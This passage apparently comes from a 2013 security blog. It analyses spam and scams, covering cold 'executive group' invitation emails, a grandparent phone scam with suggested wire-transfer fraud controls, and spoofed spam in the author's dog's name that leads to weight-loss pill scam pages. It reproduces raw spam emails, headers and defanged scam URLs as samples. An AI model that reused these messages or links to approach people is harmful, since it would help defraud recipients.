njStB0/Io4Juq+sWoOUQqiza2FCW5xvLqNqatacqn7a+YjMFLRVZyu9xQe8GTUC7bKbS
p4D+xhAPVsyMBNzh2cqqlYU9cyu1KtxFiz73V+/6ToQnXVmhAPTbEZF1IYXElYbRVUni
z/dg==
MIME-Version: 1.0
X-Received: by 10.23.23.23 with SMTP id az1mr10871160obb.26.1368626703763;
Wed, 15 May 2013 07:05:03 -0700 (PDT)
Message-ID: <089e01176259825ca904dcc23c19@>
Date: Wed, 15 May 2013 14:05:03 +0000
Subject: Gabriel, question
From: Chris H Sanders
To: g[MASKED]@christoperj.com
Content-Type: multipart/alternative; boundary=089e01176259825c9f04dcc23c16

--089e01176259825c9f04dcc23c16
Content-Type: text/plain; charset=ISO-8859-1; format=flowed; delsp=yes
Content-Transfer-Encoding: base64

PGRpdiBkaXI9Imx0ciI+PGRpdj5EZWFyIEdhYnJpZWwsPC9kaXY+PGRpdj6gPC9kaXY+PGRpdj5J
IHdhbnRlZCB0byByZWFjaCAgDQpvdXQgYW5kIHNlZSBpZiB5b3Ugd291bGQgbGlrZSB0byBiZWNv
bWUgYSBwYXJ0IG9mIGEgRW5naW5lZXJpbmcgTWFuYWdlbWVudCAgDQpMZWFkZXJzIGdyb3VwLCB3
ZSB0aGluayB0aGF0IHlvdSB3b3VsZCBiZSBhIGdyZWF0ICANCmFkZGl0aW9uLjwvZGl2PjxkaXY+
oDwvZGl2Pg0KDQoNCg0KDQoNCg0KPGRpdj5PdXIgbmV4dCBtZWV0aW5nIGlzIG9uIDYvMjAuIFRo
ZSBFbmdpbmVlcmluZyBNYW5hZ2VtZW50IGxlYWRlcnMgdGhhdCAgDQp3aWxsIGJlIHByZXNlbnRp
bmcgdGhlaXIgYmVzdCBwcmFjdGljZXMgYW5kIGlkZWFzIGluY2x1ZGUgQmFyY2xheXMsIFVOVU0g
IA0KYW5kIENoaXF1aXRhLiBXZSBtZWV0IG9uY2UgcGVyIG1vbnRoIHZpYSB0ZWxlY29uZmVyZW5j
ZSBhbmQgdGhlIG1lZXRpbmdzICANCnR5cGljYWxseSBsYXN0IGZvciBhbiBob3VyLjwvZGl2Pg0K
DQoNCg0KDQoNCg0KPGRpdj6gPC9kaXY+PGRpdj5TZWUgPGEgaHJlZj0iaHR0cDovL3RoZWVuZ2lu
ZWVyaW5nc3VtbWl0Lm5ldCIgIA0KdGFyZ2V0PSJfYmxhbmsiPnRoZWVuZ2luZWVyaW5nc3VtbWl0
Lm5ldDwvYT4gdG8gYmVjb21lIGEgcGFydCBvZiB0aGUgZ3JvdXAuICANCkp1c3QgZW50ZXIgdGhl
IGxldHRlcnMgQ1MzIGluIHRoZSBjb21tZW50cyBmaWVsZCBvZiB0aGUgc2lnbnVwIGZvcm0gdG8g
IA0KaW5kaWNhdGUgdGhhdCBJIGFza2VkIHlvdS4gRHVlIHRvIGxpbWl0ZWQgc3BhY2UgSSB3b3Vs
ZCBhZHZpc2UgdGhhdCB5b3UgIA0KYmVjb21lIGEgcGFydCBvZiB0aGUgZ3JvdXAgYmVmb3JlIG91
ciBuZXh0IG1lZXRpbmcgb24gNi8yMCwgdGhhbmsgeW91LjwvZGl2Pg0KDQoNCg0KDQoNCg0KPGRp
dj6gPC9kaXY+PGRpdj5LaW5kIFJlZ2FyZHMsPC9kaXY+PGRpdj6gPC9kaXY+PGRpdj5DaHJpcyBI
LiAgDQpTYW5kZXJzPC9kaXY+PGRpdj5FbmdpbmVlcmluZyBNYW5hZ2VtZW50IExlYWRlcnM8L2Rp
dj48ZGl2PlJlcGx5IHdpdGggIA0Kc3ViamVjdCCgUmUgbW92ZSBpZiB3aXNoZWQ8YnI+PC9kaXY+
PGRpdj42MDAgoE5vcnRoIKBQYXJrLCCgMTd0aCAgDQpGbG9vcjwvZGl2PjxkaXY+QXRsYW50YSwg
oEdlb3JnaWEgoDMwMzI4PC9kaXY+DQoNCg0KDQoNCg0KDQo8L2Rpdj4NCg==
--089e01176259825c9f04dcc23c16
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

<[HTML DIV] dir=3D"ltr"><[HTML DIV]>Dear Gabriel,< [BACKSLASH] [HTML DIV] ><[HTML DIV]>=A0< [BACKSLASH] [HTML DIV] ><[HTML DIV]>I wanted to rea=
ch out and see if you would like to become a part of a Engineering Manageme=
nt Leaders group, we think that you would be a great addition.< [BACKSLASH] [HTML DIV] ><[HTML DIV]>=
=A0< [BACKSLASH] [HTML DIV] >






<[HTML DIV]>Our next meeting is on 6/20. The Engineering Management leaders that w=
ill be presenting their best practices and ideas include Barclays, UNUM and=
Chiquita. We meet once per month via teleconference and the meetings typic=
ally last for an hour.< [BACKSLASH] [HTML DIV] >






<[HTML DIV]>=A0< [BACKSLASH] [HTML DIV] ><[HTML DIV]>See theengineeringsummit [DOT] net to become a part of the group. Jus=
t enter the letters CS3 in the comments field of the signup form to indicat=
e that I asked you. Due to limited space I would advise that you become a p=
art of the group before our next meeting on 6/20, thank you.< [BACKSLASH] [HTML DIV] >






<[HTML DIV]>=A0< [BACKSLASH] [HTML DIV] ><[HTML DIV]>Kind Regards,< [BACKSLASH] [HTML DIV] ><[HTML DIV]>=A0< [BACKSLASH] [HTML DIV] ><[HTML DIV]>Chris H. Sanders<[HTML DIV]>Engineering Management Leaders< [BACKSLASH] [HTML DIV] ><[HTML DIV]>Reply with subject =A0Re =
move if wished
< [BACKSLASH] [HTML DIV] ><[HTML DIV]>600 =A0North =A0Park, =A017th Floor< [BACKSLASH] [HTML DIV] ><[HTML DIV]>=
Atlanta, =A0Georgia =A030328< [BACKSLASH] [HTML DIV] >






< [BACKSLASH] [HTML DIV] >

--089e01176259825c9f04dcc23c16--


Update July 13th, 2013 @ 12:41p
Full email from latest version. . .

Delivered-To: christoperj@
Received: by 10.23.23.23 with SMTP id es4csp259639ldc;
Mon, 8 Jul 2013 08:53:01 -0700 (PDT)
X-Received: by 10.112.155.161 with SMTP id vx1mr11057914lbb.78.1373298778073;
Mon, 08 Jul 2013 08:52:58 -0700 (PDT)
DomainKey-Status: bad format
Received-SPF: pass (: domain of mkeener@projectmanagementsummit.net designates 66.232.113.10 as permitted sender) client-ip=66.232.113.10;
Received: by 10.112.34.75 with POP3 id x11mf3389953lbi.35;
Mon, 08 Jul 2013 08:52:57 -0700 (PDT)
X-Gmail-Fetch-Info: [MASKED] 8 pop.[MASKED] 995 [MASKED]
Return-Path:
Delivered-To: <[MASKED]>
Received: from mx1.[MASKED] ([10.98.98.136])
by mss-us12.[MASKED] (Dovecot) with LMTP id rVuOI5PS2lE6XAAAkZ4h7A
for <[MASKED]>; Mon, 08 Jul 2013 14:54:52 +0000
Received: from mail.projectmanagementsummit.net (mail.projectmanagementsummit.net [66.232.113.10])
by mx1.[MASKED] (Postfix) with ESMTP id 3B6563F1253
for ; Mon, 8 Jul 2013 14:54:48 +0000 (GMT)
Received: from 20607534.projectmanagementsummit.net
by associationgrowthsummit.net (Merak 8.9.1) with ASMTP id TVK26442
for ; Mon, 08 Jul 2013 10:54:42 -0400
Status:
Message-ID: <20130708105428.6f1c9c7b2c@1f2d>
From: "Matt Keener"
To: "Sherrie [MASKED]"
Subject: Sherrie, following up.
Date: Mon, 8 Jul 2013 10:54:28 -0400
X-Priority: 3
X-Mailer: Microsoft Windows Mail 6.0.6001.18000
MIME-Version: 1.0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi Sherrie, I was just checking back to see if you had reached a decision
per my original email below. We have a couple of openings and I thought
you would enjoy the group. Here's a partial list of some of our members
and speakers:

- Adobe
- Sony
- Bank of America
- Bristol-Myers
- Garmin

And also a number of smaller companies where we thought the head of
Project Management had a lot of creativity and ideas to share.

Can you look at the www [DOT] projectmanagementsummit [DOT] net meeting schedule and
get back to me or relay if you think another is more appropriate? The
others would really enjoy your participation.

Truly,
Matt Keener
Project Management Summits
The Organization of Project Management Executives
www [DOT] projectmanagementsummit [DOT] net

----- Original Message -----

To: Sherrie [MASKED]
From: Matt Keener
Subject: Sherrie, question.

Hi Sherrie, on behalf of our Board I wanted to ask if you would like to
become a part of the Project Management Summits because of your
experience and key role.

We are a high level group comprised of top Project Management executives
and visionaries. We meet monthly by phone to exchange what is working,
what is not, strategies and ideas. Our main goal is to help each other
achieve. For a list of those you would be interacting with and upcoming
meeting dates see: www [DOT] projectmanagementsummit [DOT] net

I am certain you will find the experience really useful in your efforts.
Let me know of your decision (or relay if you think another is more
appropriate as we wish involvement from your company). Thanks Sherrie.

Truly,
Matt Keener
Project Management Summits
The Organization of Project Management Executives



This message is confidential and intended only for the original recipient.
If you have received this message in error, please delete it or mail us
back with re move in the sub ject. If any follow-up is needed I show your
contact information as: Sherrie [MASKED], s[MASKED]@christoperj.com, Paul
Anderson Robert 254-840-2781 and you may also reach us at 2O1 17th
Street, 17

Thursday, April 25, 2013

No, I Am Not Stuck in Mexico and I Do Not Need Money to Get Me Back Home

While I was in New Jersey, I got a heads-up voicemail from my Grandfather --
"Yo Chris. Granddad. I had a telephone call this morning from somebody who identified himself as Chris. He called me by the name 'Granddad' To make a long story short, the g*#damn thing was a scam. And I recognized it before it was done and he hung up". . . (continues) . . ."But it was a little startling this morning because it sounded like you were in trouble in Mexico. Needed help. Wanted money to get out of there. That was the gist of it". . . (and so on)

My Grandfather lives in an over-55 retirement community, and his basic info can be just as easily found in the public records as everybody else. So I'm assuming somebody out there has compiled a big 'ol database of available info for likely targets and was using it for a "Grandparent Scam" spear phishing attack. Ultimate goal being to play on his fears and family compassion so he'll feel compelled to wire whatever money to wherever the bad guy actually is. All too common attack these days. Gold star to Granddad for quickly seeing it as the scam it was and shutting it down.

No caller id was available for the scammer. It probably would have been spoofed anyway. I do wonder though, how many of the other scammer targets saw through the BS so easily.

Also wondering if my Grandfather had tried to wire money somewhere, would the Western Union (or whatever wire service he decided to use) would have had the fraud checking controls in place to catch it before the money was lost to the shadows. Seems like they would. This scam being so prevalent these days, it would seem like it would be in their best interest to put something in place which would protect their customers from those who would misuse the service to commit this crime.

Talking about fraud detection controls such as:

1) Training for the employees to be able to identify suspicious transfers

2) Automated controls looking for first time transactions (as opposed to repeating transactions for bill payments or inter-family transfers)

3) Automated controls looking for suspicious transaction amounts

4) Automated controls enforcing a reputation scoring system which would detect suspicious transfers destined to those who infrequently use the system or have a odd transaction behavior

5) Automated controls enforcing transaction limits for low/no reputation customers or for international transactions

6) Validation/logging of government issued ID on both sides of the transfer.

Or some layered combination of all six and whatever others equally as important.

Something.

But I'm not seeing any specific protections on the Western Union defined website. They do, however, post a Fraud Hotline number to call (1-800-448-1492) for those who believe they have been a victim. And a search for the keyword 'fraud' does pop up info about the scam:
Screenshot from the Western Union website "Ask a Question" search
Screenshot from the Western Union website Ask a Question search
What is the "grandparent scam?"

Fraudsters are calling grandparents and impersonating either their grandchildren or a person of authority, such as law enforcement officers or attorneys. They describe an emergency situation such as bail, fines, fees, etc., that requires money to be sent immediately through a money transfer service.

It's important to verify any emergency situation before sending money. If you receive any emails like these, call a mutual friend or family and ask if they're aware of the situation.

Was this answer helpful?
Yes | No

They do have a "Consumer Protection" section listed. However, most of the information posted is more "consumer educational" on how to spot a scam rather than "Here's what we're doing to protect you with our expertise".

That said, even if the scam is predominately listed on the website, I would doubt the majority of the target audience would be on the Western Union site to see it. So that's why I'm wondering what steps Western Union has taken to address the problem behind the scenes.

And this concern is obviously NOT ONLY directed towards Western Union just because they are the ones I think of first. Many many MANY services are on the market these days for sending money quickly to anywhere. All of which could easily be exploited for this badness if there's nothing in place catch it. And clearly just because the security control is not listed for public consumption, does not mean it's not there. Could easily just not be advertised for legal liability or confidential reasons.

But still this scam persists. And not as just a random one-off. It's been out there for a long time and it's still way all too common. So much so that Google search for "Grandparent Scam" pulls up a whopping 248,000+/- results. The first hit being from the US State Department:
Screenshot from the US State Department website
Screenshot from the US State Department website
"Grandparent Scams"

In these types of scams, the perpetrator often calls a grandparent or other relative pretending to be his/her grandchild/niece/nephew, etc. The caller sounds upset and typically states there are only a few moments to talk. Callers may say that they have a cold if you don't quite recognize their voice, or cue-in on feedback from the call to sound even more convincing (scam victims often report being sure they were talking to their actual relative, but it's a clever trick!). Their story generally follows a familiar line: they were traveling in another country with a friend, and after a car accident or legal infraction, they are in jail and need bail money wired to a Western Union account as soon as possible for their quick release. . . (continues on their website here)

I have heard of some unique situations recently where an "on the ball" cashier saw the weirdness and asked the right questions to stop it before it was too late. But as infrequent as those exceptions are, and as often as this scam seems to be attempted, it seems like the wire money vendors aren't doing what they need to do to protect their customers.

Maybe it's because they're not required to?

If it was a credit card transaction, there would be a certain amount of accountability required by law. The customer has the right to dispute a fraudulent transaction. The credit card issuer then reverses the charge through the Visa/Mastercard/whatever transaction network to protect the customer (and probably in part because they don't want to eat the money). Whatever bank is being used on the other end can identify and go after the fraudster. And if they can't, they strengthen their fraud detection controls as so their bank can't be exploited next time. At least they should, but that's a different conversation. Whatever the case, the customer victim has their money back and (most) all is good.

Of what I listed above -- I know that at least controls 2 through 5 are in place with my credit card issuer based on the fraud alert calls I occasionally get. An ATM withdrawal once triggered a call to my cel within 3 minutes of me pulling the cash out while on vacation in Kauai. So I'm gathering my bank also has taken the necessary steps.

As those rights don't exist on wire transfer transactions, I'm guess I'm left to surmise there's just no real incentive to have fully robust fraud prevention controls in place to protect against this sort of way too common scam. Or at the very least, extend what controls they are required by law to detect money laundering to also detect this type of transaction.

I imagine if the same laws enforcing a $50 customer liability cap on fraudulent credit card transactions were extended to also cover fraudulent wire transfers -- then this would be a whole different ballgame. The credit card issuers and the Visa/Mastercard/whatever transaction networks have this type of detection/prevention well perfected. Largely because they are required to minimize their own risk, but it doesn't change in the slightest the controls work. It's a shame that the wire transfer networks can't (or won't) exercise the same due care for their customers.

Regardless -- I'm not in Mexico. And I'm not in trouble. (Though you can still send me money via my home address if you really want)

Good times.

Monday, January 28, 2013

No, My Dog is Not Spamming Me with Links for a Crap Weight Loss Scam (Update)

Update 3/3/2013:
This Facebook spider phishing attack was also reported on the ISC StormCast Daily Network Security Podcast for February 26th, 2013.


Original Post:
Curiously, I have been receiving spam emails from one of my dogs over the last several weeks.

Yep. This dog in fact:

Ace at Christmas

While Ace is a lot of things (protective, overgrown puppy, shedding machine, & more) computer literate is not one of them. And his paws are really too damned big to be able to use the keyboard. Nor do I really have reason to believe he thinks I should lose a few pounds.

Yet here I am getting emails claiming to be from him. All which with a different webpage link in the body. Clearly these are being maliciously spoofed, but then there's the question of how/why some spambot out there knows I have a dog named Ace.

Date: January 24th, 2013 at 7:34 AM
Sending IP: 109.93.128.35 (Serbia) via SMTP

To: christoperj
From: Ace Marcinko

Subject: great
Date: January 27th, 2013 at 4:09 AM
Sending IP: 93.177.224.71 (Latvia) via SMTP

To: christoperj
From: Ace Marcinko

Subject: awesome
Date: January 28th, 2013 at 7:00 AM
Sending IP: 151.239.254.168 (Iran) via SMTP

To: christoperj
From: Ace Marcinko

Subject: awesome

Thank you Facebook!

This isn't the first time I received a spam email from somebody spoofing somebody I know. Most of the other times have been other's address books themselves compromised by the bug of the day. Others have been unexplained.

And then there's Ace.

Ace who has neither the dexterity to use email nor an address book to be hacked. Ace does, however, have a Facebook page. And I am of course connected to him.

Based on this, I'm guessing my Facebook friend list has been spidered and has been added to the spambot's list to boost the legitimacy of the crap email. Also guessing this explains the other emails from John and Phil I've also gotten in the last month which could not be tracked back to a 'compromised address book'.

All emails seem to be coming into my well-published primary email address, so I can't determine if the email address was somehow pulled when my Facebook profile was spidered. Ace's (and the others') were only identified by name in the spoof. None of the source email addresses match the actual ones in use. No help there.

My Facebook connections are not visible unless the visitor is logged into Facebook themselves. Nor is my email address (though it's easily found elsewhere).

However, I do have more than a few connections. And my privacy settings allow everybody to see each other.

Too bad there's no real way to tell if one of the connected profiles was used to spider my contact list once they've logged in. While several of my contact's Facebook accounts have been compromised in the last few months, I can't determine a compromised account that was used to pull my Facebook contact list (or just some crap zombie account I had 'accepted' as a friend.) No help there either. Also the possibility this came through one of the handful of apps authorized to access the Facebook Account. Though these authorized apps are from higher profile providers and not one of the crap surveys or the many "whos viewed your profile" scams. Possible but not necessary a likely entry point.

That said -- Ace only has a handful connections to a handful of immediate family. None of which have had their Facebook accounts hacked lately. He also has no apps allowed on his account. And he's not getting the spam emails either.

Whatever the case, these spam emails had crap links within. None of which look like they're malicious (though this delivery method could very easily be used for such badness).

1) http://indianriverna [DOT] com/disapproveafraidnicholasparker/

2) http://dakini [DOT] tk/blackcopyencounterigarydavies/

3) http://luttu [DOT] com/dropageddanieldavies/

All three end up (after a few redirects) at variations on a somewhat authentic looking weight loss pill scam. This time pushing claims about "Garcinia Cambogia" or "Green Coffee".

(#1) and (#2) http://weightlossthatworkisnotmagicpill [DOT] com/diet/garcinia/index [DOT] html

(#3) http://weightlossthatworkisnotmagicpill [DOT] com/diet/GreenCoffeDiet-c/index [DOT] html
Authentic looking "Consumer Lifestyles" website pushing a Garcinia Cambogia weight loss scam (#1 and #2)

Same "Consumer Lifestyles" website template, but now pushing a Green Coffee weight loss scam. (#3)

The pages themselves look like they rely upon the same template and some quick find/replace about the pill they are pushing. They're also violating trademarks for legitimate news networks and using an embedded youtube video from an episode of Dr. Oz. I particularly liked how they incorporated a simple IP Geolocate script in the Green Coffee page to identify where I was coming coming from (and to point out all my local stores were out of stock of this miracle cure because of whatever demand)

All of the embeded links on either page -- including the "About", "Privacy Policy", Contact Us", the Facebook Like Button, etc -- end up (again after a few redirects) at a similar online order page

(#1) and (#2) https://offer [DOT] my-secure-page.com/fatbuster433/index [DOT] php?PubID=4&ClickID=3959471&SID=237591&SID2=218848&LPID=27&PC=47

(#3) https://offer [DOT] my-secure-page [DOT] com/greencoffeesky2554/index [DOT] php?PubID=4&ClickID=&SID=234895&SID2=218848&LPID=20&PC=27
Online order form for the Garcinia Cambogia scam (#1 and #2)
Online order form for the Garcinia Cambogia scam
Online order form for the Green Coffee scam (#3)
Online order form for the Green Coffee scam

I guess that's the only way they want to be contacted.

I do wonder why the model on the Garcinia Combogia page is sooooo much happier than the one on the Green Coffee page. Perhaps the unhappy model just found out she had to work late and actually wont be able to go to the beach today? Or maybe she misunderstood and thought she was going to provided actual coffee on this shoot and not some crap knock off pill? Or maybe she's annoyed that her pet's name is also being used to send crap emails.

Whatever the case -- at least now I've figured out why I'm now receiving emails from my dog.

Actual emails and text from both scam sites follow. . .



Email 1 -- Sent from 151.239.254.168 (Iran) via SMTP:
Delivered-To: christoperj@
Received: by 10.114.22.8 with SMTP id z8csp87384lde;
Mon, 28 Jan 2013 06:44:02 -0800 (PST)
X-Received: by 10.50.178.10 with SMTP id cu10mr5265682igc.75.1359384241463;
Mon, 28 Jan 2013 06:44:01 -0800 (PST)
Return-Path:
Received: from mailforward (mailforward. [10.10.10.10])
by mx. with ESMTP id j17si6674738igd.9.2013.01.28.06.44.00;
Mon, 28 Jan 2013 06:44:01 -0800 (PST)
Received-SPF: neutral (: 10.10.10.10 is neither permitted nor denied by best guess record for domain of mark.landrum@[MASKED]) client-ip=10.10.10.10;
Authentication-Results: mx.;
spf=neutral (: 10.10.10.10 is neither permitted nor denied by best guess record for domain of mark.landrum@[MASKED]) smtp.mail=mark.landrum@[MASKED];
dkim=pass header.i=@[MASKED]
Received: from mx1 (inbound-us1 [10.10.10.10])
by mailforward (Postfix) with ESMTP id 8A64DC40B13
for ; Mon, 28 Jan 2013 14:44:00 +0000 (GMT)
Received: from nm4.bullet.mail.ne1.[MASKED] (nm4.bullet.mail.ne1.[MASKED] [MASKED])
by mx1 (Postfix) with ESMTP id 59E2E470BC3
for ; Mon, 28 Jan 2013 14:44:00 +0000 (GMT)
Received: from [MASKED] by nm4.bullet.mail.ne1.[MASKED] with NNFMP; 28 Jan 2013 14:43:53 -0000
Received: from [MASKED] by tm9.bullet.mail.ne1.[MASKED] with NNFMP; 28 Jan 2013 14:43:53 -0000
Received: from [127.0.0.1] by smtp113.mail.ne1.[MASKED] with NNFMP; 28 Jan 2013 14:43:53 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=[MASKED]; s=s1024; t=1359384233; bh=PVq+lyXkw9/ZwyZF3FO+ziyIZAbxVMz1vpI5fUrFI90=; h=X-[MASKED]-Newman-Id:Message-ID:X-[MASKED]-Newman-Property:X-[MASKED]-OSG:X-[MASKED]-SMTP:Received:Subject:From:Date:To; b=T1RWE1dyyT/aXBn9faw8DyT0LSeH+X3KBvJCdhXiFGWTx0nw5ZI01fE8uuRUMP2CF4ZBS/nTW23ybafzNkg98XY2JXgx+dKz5xHTscc85A0a2IOgxVg4YyfPnwEwSG8WHF9FscV7jv4PrplffeF6u8QvTu+JTL+4nIcZXU6WTAw=
X-[MASKED]-Newman-Id: 88476.88781.bm@smtp113.mail.ne1.[MASKED]
Message-ID: <88476.88781.bm@smtp113.mail.ne1.[MASKED]>
X-[MASKED]-Newman-Property: ymail-3
X-YMail-OSG: zTSgRDAVM1kLstn0l8UcWZ65XYQuGwm0a2_E.KjLa0lvCiW
URl5dfbDu5EXJ0Szkt46aS41SHLUmplWsRUf5pl1gV0UhLkePDsjoT7rZnW0
1tlQV47uG2JfA0OmxtQDYCFa.eEC0r3wAATHkZk4CIOQrtUuKKFKOSRIbAtp
R7uJTtoAUEKrO8Yr1xhhoM66LHQ32Di8872OEf5A76hEutbCnzKX41LS_.WI
uxy5lMi7BtjsOzPYBO.tFCt37w390qrciheSfusTpVLBrILTl5uyNLRDnick
4QQzc2fSgfc1xt6FF9ig1f8wDjugIUOBQaczyCz.dNbz3w35bQ..iPHdt4np
zmcQEl4uYPaQlenXHUe0S8cT_kxUXP380uZipoFgMMD5i5OwyBlgeQvlpFaj
cY4zagJXRRsHisIaJkI0CBbZQPC9gIiCc6z0SENgMtUPqebRgtp0JzQ0svgv
dej96tUek1QGl1DMiDyXbVq0ulQ_aECkdOrx_SoyLJ5IAADGwCqarXPDAoPM
GyEwxGQa6hnnLpR9xTQ7hSN3wkw--
X-[MASKED]-SMTP: gWNLef2swBDN1xQ1viIi8RqT5JagVywAmA--
Received: from localhost (mark.landrum@[MASKED] with login)
by smtp113.mail.ne1.[MASKED] with SMTP; 28 Jan 2013 06:43:53 -0800 PST
Subject: awesome
From: Ace Marcinko
Date: Mon, 28 Jan 2013 06:00:46 -0700 (PDT)
To: "christoperj@"
X-CTCH-RefID: str=0001.0A0C0209.51068EB0.0136,ss=1,re=0.000,recu=0.000,reip=0.000,cl=1,cld=1,fgs=0
X-CTCH-VOD: Unknown
X-CTCH-Spam: Unknown
X-CTCH-Score: 0.000
X-CTCH-Rules:
X-CTCH-Flags: 0
X-CTCH-ScoreCust: 0.000
X-CTCH-SenderID: mark.landrum@[MASKED]
X-CTCH-SenderID-TotalMessages: 1
X-CTCH-SenderID-TotalSpam: 0
X-CTCH-SenderID-TotalSuspected: 0
X-CTCH-SenderID-TotalBulk: 0
X-CTCH-SenderID-TotalConfirmed: 0
X-CTCH-SenderID-TotalRecipients: 0
X-CTCH-SenderID-TotalVirus: 0
X-CTCH-SenderID-BlueWhiteFlag: 0

http://luttu [DOT] com/dropageddanieldavies/

Email 2 -- Sent from 93.177.224.71 (Latvia) via SMTP:
Delivered-To: christoperj@
Received: by 10.114.22.8 with SMTP id z8csp41454lde;
Sun, 27 Jan 2013 03:52:14 -0800 (PST)
X-Received: by 10.42.67.10 with SMTP id r10mr6826717ici.7.1359287532673;
Sun, 27 Jan 2013 03:52:12 -0800 (PST)
Return-Path:
Received: from mailforward. (mailforward. [10.10.10.10])
by mx. with ESMTP id i9si5746332icv.34.2013.01.27.03.52.11;
Sun, 27 Jan 2013 03:52:12 -0800 (PST)
Received-SPF: neutral (: 10.10.10.10 is neither permitted nor denied by best guess record for domain of mad4bingo467@[MASKED]) client-ip=10.10.10.10;
Authentication-Results: mx.;
spf=neutral (: 10.10.10.10 is neither permitted nor denied by best guess record for domain of mad4bingo467@[MASKED]) smtp.mail=mad4bingo467@[MASKED];
dkim=pass header.i=@[MASKED]
Received: from mx1. (inbound-us1. [10.10.10.10])
by mailforward. (Postfix) with ESMTP id A3AD4C40E68
for ; Sun, 27 Jan 2013 11:52:11 +0000 (GMT)
Received: from nm5.bullet.mail.ird.[MASKED] (nm5.bullet.mail.ird.[MASKED] [MASKED])
by mx1. (Postfix) with SMTP id 3EE316A812C
for ; Sun, 27 Jan 2013 11:52:11 +0000 (GMT)
Received: from [MASKED] by nm5.bullet.mail.ird.[MASKED] with NNFMP; 27 Jan 2013 11:52:10 -0000
Received: from [MASKED] by tm18.bullet.mail.ird.[MASKED] with NNFMP; 27 Jan 2013 11:52:10 -0000
Received: from [127.0.0.1] by smtp105.mail.ird.[MASKED] with NNFMP; 27 Jan 2013 11:52:10 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=[MASKED]; s=s1024; t=1359287530; bh=frdxqFyfjx0ooZExbCowZdte6uVXaX57m0DhyZ0oakI=; h=X-[MASKED]-Newman-Id:Message-ID:X-[MASKED]-Newman-Property:X-[MASKED]-OSG:X-[MASKED]-SMTP:Received:Subject:Date:To:From; b=GmwYg6nd5iGuEnvfRv+t4QtSAuUnElOoQClgRo24KPdpLRPyvbiHwbMNeOUV6tNgNQeD6ySC+vcJLnpPi5btj7z9PweeaBFInGKuWdWhH6F3+YSMKBxbt/FVrgetvMGp6KhJ9N+Cdfmsep6p8mRRzgFNSpDjLW+iNQaf5LrJI/o=
X-[MASKED]-Newman-Id: 519688.98777.bm@smtp105.mail.ird.[MASKED]
Message-ID: <519688.98777.bm@smtp105.mail.ird.[MASKED]>
X-[MASKED]-Newman-Property: [MASKED]-3
X-[MASKED]-OSG: PhS.YJwVM1kjaMTwBwS2.lEgEy3ASEB5RWYthEWfqVy_l09
2LNAJKR0wE4ZUk2yyg69lU_4Ni0uwkgd8AyYOSwCbmjlkTIh_4OF2BeEYs3Y
mm6uFg12b15xY5JD37y0i9sF23bVuht1FMuZLmOD47TI3UAVclMw5sUxt9WX
3YNJSS3lmpvJ0iHdeBEXdj7H3zA5h.qzUo7f8q6QCYiLWrbCBf8QQtPqP1pg
FHgC_ekA1wOWvnl4_elQQrjyLeK89RMdgHHkhWVg9k2PMPZmh7ViY9kvOPu2
axUkBUqxemxixf7zntYRP_dnsDNOIqgCn_QRdndiY6lMs8CsBXazOO4owL78
LGPYQGRQ8PGpJL0Fl0uYA.JGUT9sfVs72czD5lG1tGl40rpc3b2ktGb9p74r
O_a_3IQrSpruaG0iOtJKGDgqNdu9WUIEBvlz9EsShucMHzeNdwTev.1pMDpd
s2ObWHS4ak1QZqCp8cUgngrW8ZWtsPqmrN0XVXjqgoogcuFDBTJQxHPFSln0
sY4mMQkRCOF7FWtK9OZgKuNdtKGLfBbJF6OWWuinFf9dM8yc-
X-[MASKED]-SMTP: YMUXWDKswBDxhgmlUQu2XRMzAq62fvVBYQ--
Received: from localhost (mad4bingo467@93.177.224.71 with login)
by smtp105.mail.ird.[MASKED] with SMTP; 27 Jan 2013 03:52:10 -0800 PST
Subject: awesome
Date: Sun, 27 Jan 2013 03:09:27 -0700 (PDT)
To: "christoperj@"
From: Ace Marcinko
X-CTCH-RefID: str=0001.0A0C0206.510514EB.00D9,ss=1,re=0.000,recu=0.000,reip=0.000,cl=1,cld=1,fgs=0
X-CTCH-VOD: Unknown
X-CTCH-Spam: Unknown
X-CTCH-Score: 0.000
X-CTCH-Rules:
X-CTCH-Flags: 0
X-CTCH-ScoreCust: 0.000
X-CTCH-SenderID: mad4bingo467@[MASKED]
X-CTCH-SenderID-TotalMessages: 1
X-CTCH-SenderID-TotalSpam: 0
X-CTCH-SenderID-TotalSuspected: 0
X-CTCH-SenderID-TotalBulk: 0
X-CTCH-SenderID-TotalConfirmed: 0
X-CTCH-SenderID-TotalRecipients: 0
X-CTCH-SenderID-TotalVirus: 0
X-CTCH-SenderID-BlueWhiteFlag: 0

http://dakini [DOT] tk/blackcopyencounterigarydavies/

Email 3 -- Sent from 109.93.128.35 (Serbia) via SMTP:
Delivered-To: christoperj@
Received: by 10.114.22.8 with SMTP id z8csp72009lde;
Thu, 24 Jan 2013 07:16:25 -0800 (PST)
X-Received: by 10.50.160.137 with SMTP id xk9mr1458533igb.77.1359040584148;
Thu, 24 Jan 2013 07:16:24 -0800 (PST)
Return-Path:
Received: from mailforward. (mailforward. [10.10.10.10])
by mx. with ESMTP id or2si1705280igc.3.2013.01.24.07.16.23;
Thu, 24 Jan 2013 07:16:24 -0800 (PST)
Received-SPF: neutral (: 10.10.10.10 is neither permitted nor denied by best guess record for domain of may_raynaholic@[MASKED]) client-ip=10.10.10.10;
Authentication-Results: mx.;
spf=neutral (: 10.10.10.10 is neither permitted nor denied by best guess record for domain of may_raynaholic@[MASKED]) smtp.mail=may_raynaholic@[MASKED];
dkim=pass header.i=@[MASKED]
Received: from mx1. (inbound-us2. [10.10.10.10])
by mailforward. (Postfix) with ESMTP id 51B34C41AE5
for ; Thu, 24 Jan 2013 15:16:23 +0000 (GMT)
Received: from nm28-vm7.bullet.mail.gq1.[MASKED] (nm28-vm7.bullet.mail.gq1.[MASKED] [MASKED])
by mx1. (Postfix) with ESMTP id 2B0783F01F2
for ; Thu, 24 Jan 2013 15:16:23 +0000 (GMT)
Received: from [MASKED] by nm28.bullet.mail.gq1.[MASKED] with NNFMP; 24 Jan 2013 15:16:17 -0000
Received: from [MASKED] by tm10.bullet.mail.gq1.[MASKED] with NNFMP; 24 Jan 2013 15:16:17 -0000
Received: from [127.0.0.1] by smtp214.mail.gq1.[MASKED] with NNFMP; 24 Jan 2013 15:16:17 -0000
